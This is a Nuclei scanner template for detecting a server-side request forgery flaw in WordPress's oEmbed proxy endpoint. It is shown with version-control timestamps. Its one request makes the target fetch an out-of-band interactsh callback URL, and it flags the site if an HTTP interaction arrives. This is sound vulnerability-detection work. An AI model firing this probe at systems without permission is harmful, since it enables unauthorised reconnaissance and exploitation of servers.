nuclei-templates/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml

21 lines
525 B
YAML
Raw Normal View History

2021-12-16 08:18:34 +00:00
id: wordpress-ssrf-oembed
info:
name: Wordpress : /wp-json/oembed/1.0/proxy - SSRF
author: dhiyaneshDk
severity: medium
reference:
- https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
- https://github.com/incogbyte/quickpress/blob/master/core/req.go
tags: wordpress,ssrf,oast
requests:
- method: GET
path:
2021-12-16 08:51:53 +00:00
- "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"
2021-12-16 08:18:34 +00:00
matchers:
- type: word
2021-12-16 08:51:53 +00:00
part: interactsh_protocol
2021-12-16 08:18:34 +00:00
words:
- "http"